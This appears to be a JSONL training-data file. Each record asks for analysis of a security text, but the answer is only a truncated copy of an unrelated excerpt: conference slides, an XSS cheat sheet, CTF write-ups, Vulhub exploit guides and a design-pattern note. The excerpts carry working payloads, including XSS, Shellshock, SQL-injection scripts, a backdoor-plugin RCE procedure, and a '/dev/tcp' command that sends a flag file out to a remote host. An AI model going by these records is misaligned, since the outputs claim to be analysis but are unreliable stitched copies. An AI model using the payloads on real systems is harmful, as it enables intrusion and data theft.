{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIt WISN't me, attacking industrial wireless mesh networks DEF CON 26 Introduction Erwin Paternotte Lead security consultant @stokedsecurity Mattijs van Ommeren Principal security consultant @alcyonsecurity 15.7.2018 2 Previous research WirelessHART A Security Analysis, Max Duijsens, Master (2015) - https://pure.tue.nl/ws/files/47038470/800499-1.pdf Attacking the plant through WirelessHART, Mattijs & Erwin, S4 Miami (2016) -https://www.youtube.com/watch?v=AlEpgutwZvc Denial of service attacks on ICS wireless protocols, Blake Johnson, S4 Miami (2018)  slides/video no longer available Wrights principle: Security does not improve until practical tools for exploration of the attack surface are made available. 15.7.2018 3 Industrial (r)evolution A brief history of control systems: ~1940: Air: Pneumatic logic systems: 3 - 15 psi Mid 1950: Analog: Current loop: 4 - 20 mA Mid 1980: Digital: HART, Fieldbus, Profibus Late 2000: Wireless mesh networks WirelessHART ISA 100.11a 15.7.2018 4 Industrial process control loop 15.7.2018 5 Introduction to WirelessHART Supports HART application layer Single encryption cipher/key length (AES CCM*) Wireless technology based on Time Synced Mesh Protocol developed by Dust Networks Radio SoC exclusively provided by Dust Networks 15.7.2018 6 Introduction to ISA 100.11a Relies on several standards: 6LoWPAN/IPv6/UDP Ability to tunnel other protocols Vendor neutral application layer Mainly developed by Nivis Generic 802.15.4 chips provided by multiple vendors: STM, NXP, Texas Instruments, OKI 15.7.2018 7 WISN topology 15.7.2018 8 Protocol stacks 15.7.2018 9 Common denominators 802.15.4 MAC layer at 2.4 Ghz Time Slotted Channel Hopping in order to: Minimize interference with other radio signals Mitigate multipath fading Centralized network & security manager orchestrates communication between nodes Concluded that developing a common sniffer for both protocols should be possible 15.7.2018 10 WirelessHART & ISA100.11a Security AES CCM* (CBC-MAC with", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMind Games 1 Introduction to The Last Science Fiction Story I ts true, the breaking waves of the future  as we construct it inside our societal mind, inside our cultural frames - inundate the past and the future often happens now before the past, some of the eddies of the future, some of the backwaters of the past. But it helps to remember that nobody can surf all the waves, that eddies and backwaters, dragging us into the tide or sucking us back into the water like waves on a beach, hold all of us back or down in most domains while we see clearly only in a few selected others. Thats why the Masters can do what they do, breaking memory into bits. We call geniuses those who surf two or three waves at a time and integrate their experiences in a true-life tale of a surf bums life. Thats not me. All I can do is document the end of time as it had been constructed in this little blip of historical fiction. If history is our myth, maybe this is a time of demythologizing. Maybe fiction is our myth, now, not history. And of course by time I dont mean time, whatever that might be. If exploring UFO phenomena for more than thirty years has taught me anything, its that our lack of comprehen- sion of what is happening is not about space. Its about time. Yes. Its about time. Isnt it? Richard Thieme 2 Mind Games 3 The Last Science Fiction Story Science fiction is how a left-brain society once dreamed of the future. The dreams became real over long periods of time. Leonardo daVinci dreamed of submersibles, flying machines, all kinds of crazy contraptions. One would guess that many of his contemporaries thought he was crazy. Think of a Neolithic genius trying to describe an automobile. The feedback loop from crazy to sane took a long time. Humans are social animals. So civilization is a feedback machine. We build reality in the image of our dreams. As the project of civiliza- tion became distributed and more flattened, quicker feedback meant implementing more dreams in less time. Sev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# XSS Cheat Sheet (Basic) ## Introduction Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack: - Reflected XSS Attack where the malicious script runs from another website through the web browser - Stored XSS Stored attacks are those where the injected script is permanently stored on the target servers - DOM-Based XSS A type of XSS that has payloads found in the DOM rather than within the HTML code. ## Where to find This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code. ## How to exploit 1. Basic payload ```html <script>alert(1)</script> <svg/onload=alert(1)> <img src=x onerror=alert(1)> ``` 2. Add ' or \" to escape the payload from value of an HTML tag ```html \"><script>alert(1)</script> '><script>alert(1)</script> ``` * Example source code ```html <input id=\"keyword\" type=\"text\" name=\"q\" value=\"REFLECTED_HERE\"> ``` * After input the payload ```html <input id=\"keyword\" type=\"text\" name=\"q\" value=\"\"><script>alert(1)</script> ``` 3. Add --> to escape the payload if input lands in HTML comments. ```html --><script>alert(1)</script> ``` * Example source code ```html <!-- REFLECTED_HERE --> ``` * After input the payload ```html <!-- --><script>alert(1)</script> --> ``` 4. Add </tag> when the input inside or between opening/closing tags, tag can be ```<a>,<title>,<script>``` and any other HTML tags ```html </tag><script>alert(1)</script> \"></tag><script>alert(1)</script> ``` * Example source code ```html <a href=\"https://target.com/1?status=REFLECTED_HERE\">1</a> ``` * After input the payload ```html <a href=\"https://target.com/1?status=\"></a><script>alert(1)</script>\">1</a> ``` 5. Use when input inside an attributes value of an HTML tag but > is filtered ```html \" onmouseover=alert(1) \" autofocus onfocus=alert(1) ``` * Example source code ```html <input id=\"keyword\" type=\"text\" nam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwindows特权滥用攻击 本文主要介绍利用windows特权滥用进行本地权限提升攻击 特权滥用的bug 以高权限运行的进程(一般指system权限)会像其他进程一样对文件进行各类操作(如增删改查)当高权限 进程在没有进行任何防御措施的情况下访问用户文件或者是目录时则有可能造成安全问题我们一般所 熟知的此类问题有DLL planting或者是利用可写服务操作等但除此之外还有其他的文件系统的攻击方 法可以被我们利用且由于此类攻击属于逻辑漏洞不涉及内存操作所以不会像内核提权那样有太多的 版本限制以及可能造成的bsod等风险 漏洞位置 用户可写项 一般用户(普通用户)可以写入的位置如下 用户自己的目录文件包括其appdata和temp文件夹一般高权限进程不会访问此类文件AV 除外 public的文件目录 C:\\ProgramData及其子目录 C:\\Windows\\Temp及其子目录 至于一个文件目录的权限查看方式则有很多 AccessChk, icacls ,Get-Acl等最简单的就是直接用GUI的 文件夹查看器 特权文件操作 这个简单的方法就是procmon来看了直接过滤指定事件即可 但这些仅为进程自己执行的操作如果你想深入挖掘更多的信息如ALPCCOM等等的话则需要自己 逆向相关程序 漏洞利用 这个已经有了N多的利用文章了根据情况来使用即可 https://googleprojectzero.blogspot.com/2015/08/windows-10hh-symbolic-link-mitigations.html https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html 并且开源了利用工具https://github.com/googleprojectzero/symboliclink-testing-tools 及.net库h ttps://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtApiDot Net NTFS junctions NTFS链接有点类似于linux下面的mount功能即允许将文件设置为文件系统的挂载点 如图所示在打开C:\\Dir\\file.txt 时将打开C:\\Other\\file.txt也可以进行跨卷操作比如将C:\\Dir\\重定向 到D:\\Dir\\一般可以利用symboliclink-testing-tools中的CreateMountPoint 工具来实现这一点如果 只是单纯的想要创建链接的话可以使用mklink或者powershell中的New-Item的-Type Junction 参 数 Hard links 硬链接含义与linux中的含义相同不支持目录和跨卷操作(无意义) symboliclink-testing-tools中的CreateHardLink可以进行此类操作此类攻击在win10中得到缓解其 缓解如下 所以在新版本的windows中如果使用NtApiDotNet库来进行创建硬链接的话会显示以下情况 Object Manager symbolic links 虽然 NTFS 确实提供文件系统符号链接但在 Windows 上非特权用户无法在文件系统上创建符号链 接它需要SeCreateSymbolicLinkPrivilege默认情况下仅授予管理员然而非特权用户可以在 Windows 的对象管理器中创建符号链接顾名思义它管理诸如进程和文件之类的对象用户可以在可 写对象目录中创建对象符号链接例如\\RPC CONTROL\\这些符号链接可以指向任意路径包括文件 系统上的路径无论该路径当前是否存在 作为非特权用户我们可以链接一个挂载点该挂载点解析为该\\RPC Contr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWMCTF WriteUp By Nu1L AuthorNu1L Team WMCTF WriteUp By Nu1L RE Meet_in_July Welcome to CTF Wmware easy_apk easy_re WEB Make PHP Great Again gogogo base64 Make PHP Great Again 2.0 web_checkin2 SimpleAuth webweb web_checkin Misc Music_game XMAN_Happy_birthday Performance_artist sign-in Dalabengba Part1 Part2 Part3 Music_game_2 FeedBack Crypto piece_of_cake babySum Game Pwn roshambo cfgo-CheckIn mengyedekending RE Meet_in_July exeMIRACL N 320265757102059730318470218759311257989*361550014853497117429835520396253724753 Mathematicax Welcome to CTF Maincheck WMCTF{VGlrcFtsdVhmZn5UamFvaBAREhMVFxUTHR8dExUXFRM=} patchpatch // flag: flag{flag_part}flag_part 0-9A-F x = bytes_to_long(unhexlify(flag_part)) d = 15956426724371358762446154331862284300421200863619433817153609426765022725189 N = 115792089237316195423570985008687907932742180837157534228835789659027378301717 check if -7 x + 14 x3 - 7 x5 + x7 == d (mod N) Solve[{-7 *x + 14 *x3 - 7 *x5 + x7 == Mod[159564267243713587624461543318622843004212008636194338171536094\\ 26765022725189, 320265757102059730318470218759311257989]}, Modulus -> 320265757102059730318470218759311257989] // {{x -> 314046182507365208896881670173330660473}} Solve[{-7 *x + 14 *x3 - 7 *x5 + x7 == Mod[159564267243713587624461543318622843004212008636194338171536094\\ 26765022725189, 361550014853497117429835520396253724753]}, Modulus -> 361550014853497117429835520396253724753] // {{x -> 10723067319997533594300359658518990548}} ChineseRemainder[{314046182507365208896881670173330660473, 10723067319997533594300359658518990548}, \\ {320265757102059730318470218759311257989, 361550014853497117429835520396253724753}] // 1760820454524237872034879379805812342557597909323435364594773299479816\\ 3637792 x = 176082045452423787203487937980581234255759790932343536459477329947\\ 98163637792 Mod[-7 *x + 14 *x3 - 7 *x5 + x7, 115792089237316195423570985008687907932742180837157534228835789\\ 659027378301717] // 1595642672437135876244615433186228430042120086361943381715360942676502\\ 2725", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: HTML Characters Entities date: 2022-01-13 11:44:21 tags: - html - code - characters categories: - Other intro: | This cheatsheet is a complete list of HTML entities with their numbers and names. Also included is a full list of ASCII characters that can be represented in HTML. --- HTML Character Entity References {.cols-1} --------------- ### HTML Special Characters | HTML | Symbol | Numeric | Description | Hex | CSS (ISO) | JS (Octal) | |----------------|--------------|--------------|--------------------------|-----------------|-------------------|---------------------| | `&quot;` | \" | `&#34;` | quotation mark | u+0022 ISOnum | \\\\0022 | <a href='javascript:alert(&quot;\\42&quot;)'>\\42</a> | | `&num;` | # | `&#35;` | number sign | u+0023 ISOnum | \\\\0023 | <a href='javascript:alert(&quot;\\43&quot;)'>\\43</a> | | `&dollar;` | $ | `&#36;` | dollar sign | u+0024 ISOnum | \\\\0024 | <a href='javascript:alert(&quot;\\44&quot;)'>\\44</a> | | `&percnt;` | % | `&#37;` | percent sign | u+0025 ISOnum | \\\\0025 | <a href='javascript:alert(&quot;\\45&quot;)'>\\45</a> | | `&amp;` | & | `&#38;` | ampersand | u+0026 ISOnum | \\\\0026 | <a href='javascript:alert(&quot;\\46&quot;)'>\\46</a> | | `&apos;` | ' | `&#39;` | apostrophe | u+0027 ISOnum | \\\\0027 | <a href='javascript:alert(&quot;\\47&quot;)'>\\47</a> | | `&lpar;` | ( | `&#40;` | left parenthesis | u+0028 ISOnum | \\\\0028 | <a href='javascript:alert(&quot;\\50&quot;)'>\\50</a> | | `&rpar;` | ) | `&#41;` | right parenthesis | u+0029 ISOnum | \\\\0029 | <a href='javascript:alert(&quot;\\51&quot;)'>\\51</a> | | `&ast;` | * | `&#42;` | asterisk | u+002A ISOnum | \\\\002a | <a href='javascript:alert(&quot;\\52&quot;)'>\\52</a> | | `&plus;` | + | `&#43;` | plus sign | u+002B ISOnum | \\\\002b | <a href='javascript:alert(&quot;\\53&quot;)'>\\53</a> | | `&comma;` | , | `&#44;` | comma | u+002C ISOnum | \\\\002c | <a href='javascript:alert(&quot;\\54&quot;)'>\\54</a> | | `&minus;` | - | `&#45;` | hyphen-minus | u+002D ISOnum | \\\\002d | <a href='javascript:a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbout me o What I am not?  Formally Educated  Developer  Hacker o What I am?  Interested How I am about to spend your time? o What is GoH? o What's behind it? o Not so wet T-Shirt contest o Node.js potential risks o Takeaways Game of Hacks  An idea is born using System; using System.Security.Cryptography; class Program { static void Main() { using (RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider()) { // Buffer storage. byte[] data = new byte[4]; // Ten iterations. for (int i = 0; i < 10; i++) { // Fill buffer. rng.GetBytes(data); // Convert to int 32. int value = BitConverter.ToInt32(data, 0); Console.WriteLine(value); } // other Random Generation method Random otherRandomGenerator = new Random(); double otherRandomNumber = otherRandomGenerator.NextDouble(); Spot The Vulnerability CISO Concerns  Education and Awareness (https://www.owasp.org/images/2/28/Owasp-ciso-report-2013-1.0.pdf 1+1=? Launched on August More than 100,000 games were played since What was behind GoH? Honeypot o We assumed the game would be attacked o We might as well learn from it o Vulnerabilities were left exposed and patched along the way Lets take a look at the game GoH Architecture Server Client Single Thread Events handler Code.DanYork.Com Event Driven 12 Question Answers Code Snippet 60-Second Timer Question # Score Difficulty Level Game Entities o Quiz questions o Answers o Score o Timer Get your Browsers ready! Checkmarx@Defcon 23 Turn your mobile devices ON! Go to: www.kahoot.it Answered Question o Initially users initiated app.sendAnswers multiple times, until they got Correct answer response. o This allowed malicious users to systematically locate the correct answer  and to gain points over and over for the same question. o Solutions  Question Already Answered flag added Timer o GoH Version 1  Timer handled by client  User forced to go to next question when time ends  Client sends to server Answer + Time spent o GoH 2  Time is now computed at the server with minor traffic ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Hijacking Arbitrary .NET Application Control Flow Topher Timzen & Ryan Allen Southern Oregon University Cybersecurity Research Lab F ABSTRACT This paper describes the use of Reflection in .NET and how it can be utilized to change the control flow of an arbitrary application at runtime. A tool, Gray Storm, will be introduced that can be injected into an AppDomain and used to control the executing assembly instruc- tions after just-in-time compilation. 1 INTRODUCTION The .NET Framework is used in a variety of enterprise applications such as fingerprint read- ers and SQL databases with the C# program- ming language. Through the use of Reflection the framework grants the ability to look at metadata for assemblies, classes, and methods within an application. This ability allows a ma- licious application to read the metadata of a specific entity in a running AppDomain. That information can be utilized to modify the be- havior of a target processs AppDomain at run- time. .NET AppDomains are equivalent to a pro- cess and are containers for running code. An application may have several AppDomains and all of them can be accessed through Reflection. Because of the nature of just-in-time compila- tion (JIT/Jitter), memory is marked readable, writable and executable (rwx) as the JIT com- piler needs to write generated machine code from Intermediate Language (IL) to memory for execution. Gray Storm takes advantage of the way the .NET Framework uses Reflection and JIT. It allows an attacker to read, write and change existing methods. This can be done with com- piled on-the-fly C# code or arbitrary assembly payloads. 2 .NET BASICS When an application is compiled, IL code is generated through implicit compilation [5]. The .NET Framework will then generate machine code at runtime. The common language run- time (CLR) is used by the framework to gen- erate assembly code from IL code. IL code is an independent set of instructions that are con- verted to native machine code at JIT [6]. When a ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MeterSphere Plugin Endpoint Remote Code Execution [中文版本(Chinese version)](README.zh-cn.md) MeterSphere is a one-stop open source continuous testing platform under the GPL v3 open source license. In the version v1.16.3 and before, MeterSphere's plugin API is unauthenticated and the attackers are able to upload plugins to the server and execute arbitrary code. References: - <https://xz.aliyun.com/t/10772> ## Vulnerable environment Execute following command to start a MeterSphere server v1.16.3: ``` docker compose up -d ``` After the server is fully initialized, you can see the login page of MeterSphere on `http://your-ip:8081`. ## Exploit Firstly, by visiting `http://your-ip:8081/plugin/list`, you can see that the success message is returned without being redirected to the login page, indicating that the plugin API can be accessed without authorization. ![](1.png) Then, you should create a crafted evil plugin. Vulhub prepares a pre-built backdoor jar for it: <https://github.com/vulhub/metersphere-plugin-Backdoor/releases/tag/v1.1.0>. Upload the evil jar plugin to `/plugin/add` interface: ``` POST /plugin/add HTTP/1.1 Host: localhost:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJV2KX1EL5qmKWXsd Content-Length: 11985 ------WebKitFormBoundaryJV2KX1EL5qmKWXsd Content-Disposition: form-data; name=\"file\"; filename=\"Evil.jar\" [Paste your jar file] ------WebKitFormBoundaryJV2KX1EL5qmKWXsd-- ``` ![](2.png) > **Take care of bytes encoding by yourself if you use Burpsuite to send the package.** Althrough there is an error message is respond, the JAR package path is already added into URL classloader which means we can exploit it. Use following request to execute arbitrary command: ``` POST /plugin/custom", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe$newest$version$of$this$slide$deck$and$other$ related$stuff$can$be$found$at$ http://truckhacking.github.io/ Cheap$Tools$for$Hacking$ Heavy$Truck By#Haystack#and#Six#Volts What$we$are$going$to$talk$about  Heavy#Trucks:#similarities#and#differences#from#cars  R&D#Problems:#Trucks#are#expensive#and#the#workaround  Networking#Protocols#and#Standards  Adventures#in#truck#hacking  New#Hardware#Tools Some$Quick$Notes  We#assume#that#you#are#familiar#with#basic#vehicle#networking# concepts# e.g.#there#are#computers#in#cars#and#they#use#a#network  We#also#assume#you#are#familiar#with#the#idea#that#you#can#do#bad# things#once#you#are#on#those#networks  We#are#leaving#out#LOTS#of#details#for#time#reasons  Check#out#our#github  Safety#Disclaimer:#Moving#vehicles#are#dangerous.#Do#not#fuzz#a#rental# vehicle#while#driving,#or#do#anything#else#stupid Trucks$vs.$Cars  Trucks#are#really#any#heavy#vehicle#including#but#not#limited#to# OverPtheProad#Semis,#Vocation#Trucks,#Fire#Engines,#Busses,#some# Armored#Personnel#Carriers,#Ambulances,#Armored#cars,#boats,#diesel# generators#and#agricultural#equipment.#  Exception:#Diesel#Pickup#Trucks#(these#act#more#like#cars)  Nearly#all#heavy#vehicles#are#Diesel#engines.  Different#OnPboard#Diagnostic#and#Networking#Standards# (J1939/J1708)  RP1210#governs#workstationP>adapter#interface Truck$Economics  Many#components#from#different#manufacturers#are#interchangeable# (engine,#brakes,#etc)  Example:#Navistar/International#Truck#can#be#purchased#with#either#a# Cummins#or#International/Navistar#Engine#(and#Previously#CAT#also)  This#means#that#products#from#different#manufacturers#have#to#be# interoperable  Many#trucks#operate#in#Fleets,#typically#as#homogenous#as#possible#  The#industry#is#incredibly#data#hungry,#lots#of#data#are#stored#and# transmitted  Data#hungry#industry#+#lots#of#miles#=#trucks#spend#(comparatively)# more#time#connected#to#diagnostic#computers Trucks$are$EXPENSIVE  A#new#Truck#can#cost#over#$100,000.#Ouch.  For#the#aspi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Bash Shellshock 破壳漏洞CVE-2014-6271 编译运行 ``` docker compose up -d ``` 服务启动后有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`其中safe.cgi是最新版bash生成的页面victim.cgi是bash4.3生成的页面 将payload附在User-Agent中访问victim.cgi ``` User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id ``` 命令成功被执行 ![](1.png) 同样的数据包访问safe.cgi不受影响 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 关于Heap flags `Heap flags`包含有两个与`NtGlobalFlag`一起初始化的标志: `Flags`和`ForceFlags`. 这两个字段的值不仅会受调试器的影响, 还会由windows版本而不同, 字段的位置也取决于windows的版本. * Flags字段: * 在32位Windows NT, Windows 2000和Windows XP中, `Flags`位于堆的`0x0C`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x40`偏移处. * 在64位Windows XP中, `Flags`字段位于堆的`0x14`偏移处, 而在64位Windows Vista及更新的系统中, 它则是位于`0x70`偏移处. * ForceFlags字段: * 在32位Windows NT, Windows 2000和Windows XP中, `ForceFlags`位于堆的`0x10`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x44`偏移处. * 在64位Windows XP中, `ForceFlags`字段位于堆的`0x18`偏移处, 而在64位Windows Vista及更新的系统中, 它则是位于`0x74`偏移处. 在所有版本的Windows中, `Flags`字段的值正常情况都设为`HEAP_GROWABLE(2)`, 而`ForceFlags`字段正常情况都设为`0`. 然而对于一个32位进程(64位程序不会有此困扰), 这两个默认值, 都取决于它的宿主进程(host process)的[`subsystem`](https://msdn.microsoft.com/en-us/library/ms933120.aspx)版本(这里不是指所说的比如win10的linux子系统). 只有当`subsystem`在`3.51`及更高的版本, 字段的默认值才如前所述. 如果是在`3.10-3.50`版本之间, 则两个字段的`HEAP_CREATE_ALIGN_16 (0x10000)`都会被设置. 如果版本低于`3.10`, 那么这个程序文件就根本不会被运行. 如果某操作将`Flags`和`ForgeFlags`字段的值分别设为`2`和`0`, 但是却未对`subsystem`版本进行检查, 那么就可以表明该动作是为了隐藏调试器而进行的. 当调试器存在时, 在`Windows NT`, `Windows 2000`和32位`Windows XP`系统下, `Flags`字段会设置以下标志: ``` c HEAP_GROWABLE (2) HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_SKIP_VALIDATION_CHECKS (0x10000000) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 在64位`Windows XP`系统, `Windows Vista`及更新的系统版本, `Flags`字段则会设置以下标志(少了`HEAP_SKIP_VALIDATION_CHECKS (0x10000000)`): ``` c HEAP_GROWABLE (2) HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 而对于`ForgeFlags`字段, 正常情况则会设置以下标志: ``` c HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 因为`NtGlobalFlag`标志的关系, `heap`也会设置一些标志位 * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_ENABLE_TAIL_CHECK`标志, 那么在`heap`字段中就会设置`HEAP_TAIL_CHECKING_ENABLED`标志. * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_ENABLE_FREE_CHECK`标志, 那么在`heap`字段中就会设置`FLG_HEAP_ENABLE_FREE_CHECK`标志. * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_VALIDATE_PARAMETER", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MITRE CTF - Cyber Challenge 2019 Writeups for various challenges from the 2019 [MITRE CTF competition](https://mitrestemctf.org/). Note: The challenges were taken offline immediately after the CTF ended, so the writeups are based on data available offline and therefore are less detailed.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nElectronic Frontier Finland ry http://www.effi.org/ EFFI Mikko Välimäki & Ville Oksanen DEFCON XI, 2nd August 2003 Electronic Frontier Finland ry http://www.effi.org/ Electronic Frontier Finland ry  Founded in September 2001, over 300 members  Board and many active members are experts in law and technology  Comments law proposals concerning e.g. personal privacy, freedom of speech and fair use in copyright law; makes statements, press releases and participates actively in public policy discussions  Works in close cooperation with organizations sharing the same goals and values in Europe, United States and elsewhere.  Founding member of European Digital Rights and a member of Global Internet Liberty Campaign.  EFFI's home page: http://www.effi.org/ Electronic Frontier Finland ry http://www.effi.org/ Membership development 0 50 100 150 200 250 300 350 Members Founding 2001 X-mas 2002 Summer 2002 X-mas Now Electronic Frontier Finland ry http://www.effi.org/ Why members?  Why responsibility? Why democracy?  If you want to get heard:  Get out of the closet  Say and prove there is someone you represent  Members give not only credibility, viability and financial resources but in addition, active members contribute to statements etc. much like in open source development Electronic Frontier Finland ry http://www.effi.org/ EFFI milestones  First time in press: 2001-09-03  Organization founded: 2001-09-05  First public statement about a law proposal: 2001-11-12  First time in Cable-TV: 2002-05-20  First time in a parliamentary hearing: 2002- 09-20  First time in National Radio: 2002-10-13  First time in a TV talk show: 2002-10-14 Electronic Frontier Finland ry http://www.effi.org/ Fight against EUCD  European Union Copyright Directive, EUCD == DMCA, only worse  EU member countries have to change the national laws to reflect directives  First Finnish law proposal was awful -> EFFI (and others) managed to block it in the parliament after successful hearings  Parliament ran out o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"UTF-8\"> <title>CVE-2022-22978</title> </head> <body> CVE-2022-22978 Demo via Spring security 5.6.3<br/> Admin page: <a href=\"/admin/index\">/admin/</a><br/> Payload: /admin/index%0a </body> </html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n网鼎杯-青龙组WP Author:Nu1L 网鼎杯-青龙组WP Web AreUSerialz trace notes filejava Re signal joker bang Pwn boom1 boom2 faster0 Misc 签到 Crypto you raise me up boom Web AreUSerialz bypass即可 str=O%3A11%3A\"FileHandler\"%3A2%3A%7Bs%3A2%3A\"op\"%3Bs%3A17%3A\"2.00e%2B00000000 000\"%3Bs%3A8%3A\"filename\"%3Bs%3A18%3A\"%2Fweb%2Fhtml%2Fflag.php\"%3B%7D trace 能插入的数量有限那么布尔盲注肯定不行了报错跟时间盲注结合即可 # -*- coding:utf8 -*- import requests import string import datetime import time string = '0123456789abcdefghijklmnopqrstuvwxyz0123456789-:{}' flag = '' select = 'select concat(`1`,0x3a,`2`) from (select 1,2 union select * from flag)a limit 1,1' url=\"http://3e1a55fa7c4f460fb8d88e766785d58f44ba3250aeb0456b.changame.ichunqiu.c om/register_do.php\" for n in range(1,99): for i in string: time1 = datetime.datetime.now() notes nodejs原型链污染 payload=\"1'-if(substr(({}),{},1)='{}',concat(sleep(5),1-~0),1-~0)- '\".format(select, n, i) data = { 'username': payload, 'password': 'nu1lllllll' } req = requests.post(url,data=data,timeout=5) time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 2: flag += i print(flag) break POST /edit_note HTTP/1.1 Host: ddd9447ec43848449c628ef60b3b3f4ed7b86cd7cd324e0e.changame.ichunqiu.com:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6 Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1589075824; __jsluid_h=faddad415e2e0149739390ca4232e3a7; Hm_lvt_d7682ab43891c68a00de46e9ce5b76aa=1589094149; Hm_lpvt_d7682ab43891c68a00de46e9ce5b76aa=1589094342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1589094377 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 106 id=__proto__&author=cat /flag>/dev/tcp/xxxxx/51003&raw=cat /flag>/de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 桥接Bridge ### Intent 将抽象与实现分离开来使它们可以独立变化 ### Class Diagram - Abstraction定义抽象类的接口 - Implementor定义实现类接口 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/2a1f8b0f-1dd7-4409-b177-a381c58066ad.png\"/> </div><br> ### Implementation RemoteControl 表示遥控器指代 Abstraction TV 表示电视指代 Implementor 桥接模式将遥控器和电视分离开来从而可以独立改变遥控器或者电视的实现 ```java public abstract class TV { public abstract void on(); public abstract void off(); public abstract void tuneChannel(); } ``` ```java public class Sony extends TV { @Override public void on() { System.out.println(\"Sony.on()\"); } @Override public void off() { System.out.println(\"Sony.off()\"); } @Override public void tuneChannel() { System.out.println(\"Sony.tuneChannel()\"); } } ``` ```java public class RCA extends TV { @Override public void on() { System.out.println(\"RCA.on()\"); } @Override public void off() { System.out.println(\"RCA.off()\"); } @Override public void tuneChannel() { System.out.println(\"RCA.tuneChannel()\"); } } ``` ```java public abstract class RemoteControl { protected TV tv; public RemoteControl(TV tv) { this.tv = tv; } public abstract void on(); public abstract void off(); public abstract void tuneChannel(); } ``` ```java public class ConcreteRemoteControl1 extends RemoteControl { public ConcreteRemoteControl1(TV tv) { super(tv); } @Override public void on() { System.out.println(\"ConcreteRemoteControl1.on()\"); tv.on(); } @Override public void off() { System.out.println(\"ConcreteRemoteControl1.off()\"); tv.off(); } @Override public void tuneChannel() { System.out.println(\"ConcreteRemoteControl1.tuneChannel()\"); tv.tuneChannel(); } } ``` ```java public class ConcreteRemoteControl2 extends RemoteControl { public ConcreteRemoteControl2(TV tv) { super(tv); } @Override public void on() { System.out.println(\"ConcreteRemoteControl2.on()\"); tv.on(); } @Override public void off() { System.out.println(\"ConcreteRemoteControl2.off()\"); tv.off(); } @Override public void 